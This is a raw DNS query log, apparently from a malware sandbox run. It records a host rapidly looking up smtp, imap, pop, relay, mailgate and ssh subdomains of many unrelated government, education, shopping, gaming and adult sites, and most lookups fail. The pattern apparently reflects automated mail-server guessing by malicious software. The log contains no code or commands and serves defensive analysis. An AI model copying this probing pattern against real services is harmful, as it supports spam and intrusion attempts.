                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.477936029 CET1.1.1.1192.168.2.60x496cName error (3)ssh.srienlinea.sri.gob.ecnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.482716084 CET1.1.1.1192.168.2.60xa0ddName error (3)imap.m.sellercenter.lazada.com.mynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.487637997 CET1.1.1.1192.168.2.60xd08No error (0)www.minecraft.netwww.minecraft.net-v1.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.489227057 CET1.1.1.1192.168.2.60xe994Name error (3)smtp.s163-es.ogame.gameforge.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.503001928 CET1.1.1.1192.168.2.60xdcd4Name error (3)pop.mitextoescolar.mineduc.clnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.503071070 CET1.1.1.1192.168.2.60xdcd4Name error (3)pop.mitextoescolar.mineduc.clnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.507370949 CET1.1.1.1192.168.2.60x7462Name error (3)auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.516856909 CET1.1.1.1192.168.2.60x496cName error (3)ssh.srienlinea.sri.gob.ecnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.516891003 CET1.1.1.1192.168.2.60xa0ddName error (3)imap.m.sellercenter.lazada.com.mynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.535393953 CET1.1.1.1192.168.2.60x7462Name error (3)auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.541749001 CET1.1.1.1192.168.2.60x284cServer failure (2)relay.brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.556756020 CET1.1.1.1192.168.2.60xbae8Name error (3)mail.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.566173077 CET1.1.1.1192.168.2.60x589aName error (3)smtp.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.566319942 CET1.1.1.1192.168.2.60xf49bName error (3)mailgate.analvids.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.567704916 CET1.1.1.1192.168.2.60xcd1dName error (3)pop.sport.autoplay.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.569173098 CET1.1.1.1192.168.2.60xeed0Name error (3)imap.transaccional.saludtotal.com.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.573234081 CET1.1.1.1192.168.2.60x70ddName error (3)relay.account.live.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.582825899 CET1.1.1.1192.168.2.60x8e7cName error (3)imap.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.593636990 CET1.1.1.1192.168.2.60xb3dcNo error (0)www.hero-wars.comwww.hero-wars.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.608046055 CET1.1.1.1192.168.2.60xd12aName error (3)relay.vidcorn.tvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.637005091 CET1.1.1.1192.168.2.60x1c37Name error (3)pop3.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.637042999 CET1.1.1.1192.168.2.60x1c37Name error (3)pop3.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.650186062 CET1.1.1.1192.168.2.60x63d6Name error (3)mailgate.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.678826094 CET1.1.1.1192.168.2.60xe4f4Name error (3)imap.signup2.br.leagueoflegends.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.690809965 CET1.1.1.1192.168.2.60x8415Name error (3)imap.s163-es.ogame.gameforge.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.693720102 CET1.1.1.1192.168.2.60xecd1Name error (3)mailgate.student.emis.gov.egnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.693754911 CET1.1.1.1192.168.2.60xecd1Name error (3)mailgate.student.emis.gov.egnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.696716070 CET1.1.1.1192.168.2.60x5217Name error (3)mailgate.midetuvelocidad.claro.com.penonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.738662004 CET1.1.1.1192.168.2.60x6865Server failure (2)relay.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.748982906 CET1.1.1.1192.168.2.60x870cName error (3)relay.uh.isnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.749186039 CET1.1.1.1192.168.2.60x77f5Name error (3)relay.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.773829937 CET1.1.1.1192.168.2.60x5cb0No error (0)pop.innovationdevelopment.euinnovationdevelopment.euCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.773829937 CET1.1.1.1192.168.2.60x5cb0No error (0)innovationdevelopment.eu185.51.191.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.773864985 CET1.1.1.1192.168.2.60x5cb0No error (0)pop.innovationdevelopment.euinnovationdevelopment.euCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.773864985 CET1.1.1.1192.168.2.60x5cb0No error (0)innovationdevelopment.eu185.51.191.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.789741039 CET1.1.1.1192.168.2.60x8da9Name error (3)mailgate.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.796992064 CET1.1.1.1192.168.2.60xc4c5Name error (3)relay.contribuyente.seniat.gob.venonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.813790083 CET1.1.1.1192.168.2.60xb6aeName error (3)pop.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.813822985 CET1.1.1.1192.168.2.60xb6aeName error (3)pop.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.850940943 CET1.1.1.1192.168.2.60xaef9Name error (3)ssh.gitam.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.863507986 CET1.1.1.1192.168.2.60x8a62Name error (3)imap.loopex.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.871254921 CET1.1.1.1192.168.2.60x987cName error (3)imap.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.872544050 CET1.1.1.1192.168.2.60x3162Server failure (2)smtp.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.880795002 CET1.1.1.1192.168.2.60x870cName error (3)relay.uh.isnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.880880117 CET1.1.1.1192.168.2.60x8da9Name error (3)mailgate.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.887731075 CET1.1.1.1192.168.2.60xbe12No error (0)www.kwyk.frkwyk-lb-1828602630.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.887731075 CET1.1.1.1192.168.2.60xbe12No error (0)kwyk-lb-1828602630.eu-west-1.elb.amazonaws.com46.51.171.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.887731075 CET1.1.1.1192.168.2.60xbe12No error (0)kwyk-lb-1828602630.eu-west-1.elb.amazonaws.com54.75.198.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.887767076 CET1.1.1.1192.168.2.60xbe12No error (0)www.kwyk.frkwyk-lb-1828602630.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.887767076 CET1.1.1.1192.168.2.60xbe12No error (0)kwyk-lb-1828602630.eu-west-1.elb.amazonaws.com46.51.171.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.887767076 CET1.1.1.1192.168.2.60xbe12No error (0)kwyk-lb-1828602630.eu-west-1.elb.amazonaws.com54.75.198.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.963682890 CET1.1.1.1192.168.2.60xa127Name error (3)mailgate.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.030860901 CET1.1.1.1192.168.2.60xd4bbName error (3)mailgate.m.sellercenter.lazada.com.mynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.055989027 CET1.1.1.1192.168.2.60xe549Name error (3)pop3.sport.autoplay.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.078012943 CET1.1.1.1192.168.2.60xd4bbName error (3)mailgate.m.sellercenter.lazada.com.mynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.121161938 CET1.1.1.1192.168.2.60xdad4Name error (3)imap.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.140892029 CET1.1.1.1192.168.2.60xf8e2Name error (3)mailgate.transaccional.saludtotal.com.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.154301882 CET1.1.1.1192.168.2.60x3b03Name error (3)smtp.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.159488916 CET1.1.1.1192.168.2.60x4b5dName error (3)mail.auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.178761005 CET1.1.1.1192.168.2.60xed7bName error (3)relay.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.198507071 CET1.1.1.1192.168.2.60x708cName error (3)mailgate.s163-es.ogame.gameforge.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.209847927 CET1.1.1.1192.168.2.60xeedName error (3)relay.midetuvelocidad.claro.com.penonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.219551086 CET1.1.1.1192.168.2.60x3375Name error (3)relay.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.231573105 CET1.1.1.1192.168.2.60x5dceName error (3)ssh.zuhauseplus.vodafone.denonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.231615067 CET1.1.1.1192.168.2.60x5dceName error (3)ssh.zuhauseplus.vodafone.denonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.235811949 CET1.1.1.1192.168.2.60x51b0Name error (3)mailgate.signup2.br.leagueoflegends.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.240912914 CET1.1.1.1192.168.2.60x1aaeName error (3)mailgate.loopex.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.245163918 CET1.1.1.1192.168.2.60x1887Name error (3)mailgate.sport.autoplay.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.258090973 CET1.1.1.1192.168.2.60x660fName error (3)relay.analvids.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.283389091 CET1.1.1.1192.168.2.60x9de2Name error (3)smtp.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.310209990 CET1.1.1.1192.168.2.60xa272Name error (3)smtp.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.328695059 CET1.1.1.1192.168.2.60x99feName error (3)mailgate.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.354964018 CET1.1.1.1192.168.2.60x313aName error (3)smtp.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.371032953 CET1.1.1.1192.168.2.60x7acfName error (3)relay.transaccional.saludtotal.com.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.398057938 CET1.1.1.1192.168.2.60xc250Name error (3)mailgate.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.401895046 CET1.1.1.1192.168.2.60x24a3Name error (3)relay.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.411737919 CET1.1.1.1192.168.2.60xff73Name error (3)relay.s163-es.ogame.gameforge.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.428230047 CET1.1.1.1192.168.2.60xac8bName error (3)ssh.milogin.michigan.govnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.433079958 CET1.1.1.1192.168.2.60x67f6Name error (3)ssh.steamcommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.438117027 CET1.1.1.1192.168.2.60xa2ffName error (3)pop3.mitextoescolar.mineduc.clnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.438136101 CET1.1.1.1192.168.2.60xa2ffName error (3)pop3.mitextoescolar.mineduc.clnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.459036112 CET1.1.1.1192.168.2.60x16c5Name error (3)relay.signup2.br.leagueoflegends.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.470974922 CET1.1.1.1192.168.2.60x6992Name error (3)relay.loopex.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.471352100 CET1.1.1.1192.168.2.60xead0Name error (3)mailgate.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.472742081 CET1.1.1.1192.168.2.60x67edName error (3)ssh.contribuyente.seniat.gob.venonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.485307932 CET1.1.1.1192.168.2.60x24a3Name error (3)relay.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.488699913 CET1.1.1.1192.168.2.60x34b5Name error (3)relay.sport.autoplay.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.518132925 CET1.1.1.1192.168.2.60x97fbNo error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.518151045 CET1.1.1.1192.168.2.60x97fbNo error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.518182039 CET1.1.1.1192.168.2.60x97fbNo error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.560913086 CET1.1.1.1192.168.2.60xb6e4Name error (3)relay.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564865112 CET1.1.1.1192.168.2.60x49f9No error (0)m.sellercenter.lazada.com.myasc-hub.lazada.com.myCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564865112 CET1.1.1.1192.168.2.60x49f9No error (0)asc-hub.lazada.com.myxjp.wagbridge-lazada.alibaba-inc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564865112 CET1.1.1.1192.168.2.60x49f9No error (0)xjp.wagbridge-lazada.alibaba-inc.comxjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564865112 CET1.1.1.1192.168.2.60x49f9No error (0)xjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comlazada-sg.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564865112 CET1.1.1.1192.168.2.60x49f9No error (0)lazada-sg.alibaba.comlazada-sg.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564865112 CET1.1.1.1192.168.2.60x49f9No error (0)lazada-sg.alibaba.com.gds.alibabadns.comrg-sg.lazada.wagbridge.aserver-lazada.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564865112 CET1.1.1.1192.168.2.60x49f9No error (0)rg-sg.lazada.wagbridge.aserver-lazada.alibaba.comrg-sg.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564865112 CET1.1.1.1192.168.2.60x49f9No error (0)rg-sg.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.com47.246.165.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564945936 CET1.1.1.1192.168.2.60x49f9No error (0)m.sellercenter.lazada.com.myasc-hub.lazada.com.myCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564945936 CET1.1.1.1192.168.2.60x49f9No error (0)asc-hub.lazada.com.myxjp.wagbridge-lazada.alibaba-inc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564945936 CET1.1.1.1192.168.2.60x49f9No error (0)xjp.wagbridge-lazada.alibaba-inc.comxjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564945936 CET1.1.1.1192.168.2.60x49f9No error (0)xjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comlazada-sg.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564945936 CET1.1.1.1192.168.2.60x49f9No error (0)lazada-sg.alibaba.comlazada-sg.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564945936 CET1.1.1.1192.168.2.60x49f9No error (0)lazada-sg.alibaba.com.gds.alibabadns.comrg-sg.lazada.wagbridge.aserver-lazada.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564945936 CET1.1.1.1192.168.2.60x49f9No error (0)rg-sg.lazada.wagbridge.aserver-lazada.alibaba.comrg-sg.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.564945936 CET1.1.1.1192.168.2.60x49f9No error (0)rg-sg.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.com47.246.165.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.565026999 CET1.1.1.1192.168.2.60x49f9No error (0)m.sellercenter.lazada.com.myasc-hub.lazada.com.myCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.565026999 CET1.1.1.1192.168.2.60x49f9No error (0)asc-hub.lazada.com.myxjp.wagbridge-lazada.alibaba-inc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.565026999 CET1.1.1.1192.168.2.60x49f9No error (0)xjp.wagbridge-lazada.alibaba-inc.comxjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.565026999 CET1.1.1.1192.168.2.60x49f9No error (0)xjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comlazada-sg.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.565026999 CET1.1.1.1192.168.2.60x49f9No error (0)lazada-sg.alibaba.comlazada-sg.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.565026999 CET1.1.1.1192.168.2.60x49f9No error (0)lazada-sg.alibaba.com.gds.alibabadns.comrg-sg.lazada.wagbridge.aserver-lazada.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.565026999 CET1.1.1.1192.168.2.60x49f9No error (0)rg-sg.lazada.wagbridge.aserver-lazada.alibaba.comrg-sg.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.565026999 CET1.1.1.1192.168.2.60x49f9No error (0)rg-sg.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.com47.246.165.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.614228010 CET1.1.1.1192.168.2.60x2d6Name error (3)smtp.auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.651026964 CET1.1.1.1192.168.2.60x52c0Name error (3)pop3.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.651129007 CET1.1.1.1192.168.2.60x52c0Name error (3)pop3.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.652798891 CET1.1.1.1192.168.2.60xb289Name error (3)mailgate.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.652813911 CET1.1.1.1192.168.2.60xb289Name error (3)mailgate.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.758609056 CET1.1.1.1192.168.2.60x57b7Name error (3)relay.m.sellercenter.lazada.com.mynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.758622885 CET1.1.1.1192.168.2.60x57b7Name error (3)relay.m.sellercenter.lazada.com.mynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:09.070925951 CET1.1.1.1192.168.2.60x2ee2Name error (3)mailgate.mitextoescolar.mineduc.clnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:09.071005106 CET1.1.1.1192.168.2.60x2ee2Name error (3)mailgate.mitextoescolar.mineduc.clnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:09.120547056 CET1.1.1.1192.168.2.60x5124Name error (3)relay.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:09.120584965 CET1.1.1.1192.168.2.60x5124Name error (3)relay.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:09.205511093 CET1.1.1.1192.168.2.60xc2fcName error (3)mail.student.emis.gov.egnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:09.205581903 CET1.1.1.1192.168.2.60xc2fcName error (3)mail.student.emis.gov.egnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:09.205674887 CET1.1.1.1192.168.2.60xc2fcName error (3)mail.student.emis.gov.egnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:09.969898939 CET1.1.1.1192.168.2.60xa82aName error (3)relay.student.emis.gov.egnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:09.969913006 CET1.1.1.1192.168.2.60xa82aName error (3)relay.student.emis.gov.egnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:09.969923973 CET1.1.1.1192.168.2.60xa82aName error (3)relay.student.emis.gov.egnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.283005953 CET1.1.1.1192.168.2.60x9361No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.283005953 CET1.1.1.1192.168.2.60x9361No error (0)star-mini.c10r.facebook.com31.13.65.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.291589022 CET1.1.1.1192.168.2.60xfe27No error (0)www.tiktok.comwww.tiktok.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.454509020 CET1.1.1.1192.168.2.60x9d04No error (0)m.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
